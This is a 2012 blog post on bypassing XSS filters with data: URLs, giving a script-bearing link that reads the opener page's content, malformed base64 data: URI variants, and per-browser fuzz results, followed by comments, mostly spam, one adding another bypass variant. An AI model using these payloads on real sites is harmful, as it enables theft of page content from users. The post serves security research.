Friday, April 6, 2012

Fun with data: URLs

Data URLs, especially in their base64 encoding can often be used for anti XSS filter bypasses. This gets even more important in Firefox and Opera, where newly opened documents retain access to opening page. So attacker can trigger XSS with only this semi-innocent-link:
<a target=_blank href="data:text/html,<script>alert(opener.document.body.innerHTML)</script>">clickme in Opera/FF</a>
or even use the base64 encoding of the URL:
Chrome will block the access to originating page, so that attacker has limited options:

But what if particular XSS filter knows about data: URIs and tries to reject them? We bypass, of course :) I've been fuzzing data: URIs syntax recently and I just thought you might find below examples interesting:
data:text/html;base64wakemeupbeforeyougogo,[content] // FF, Safari
data:text/html;base64,,[content] // Opera

Here are full fuzz results for vector:

BrowserBefore (ASCII)After (ASCII)
Firefox 11 9,10,13,59 anything
Safari 5.1 9,10,13,59 anything
Chrome 18 9,10,13,32,59 9,10,13,32,59
Opera 11.6 9,10,13,32,59 9,10,13,32,44,59

Not a ground-breaking result, but it may come in handy one day for you, like it did for me.


Jackmasa said...

data:text/html;base64,<<<<<<<>>>>>>>>> //opera

marsleisure said...

Hi dear! Wish you are doing
excellent, well awesome information and facts. I must say...really demonstrated
& deserving to study.

gardendecors lebanon said...

Hey! Cool Information, many thanks
for sharing this valuable knowledge. I really like it.

Malik Gupta said...

I am reviewing Adblock Plus for possible attack points nevertheless and already added frame busting code to HTML pages - just in case. Hack Facebook

Joana Kane said...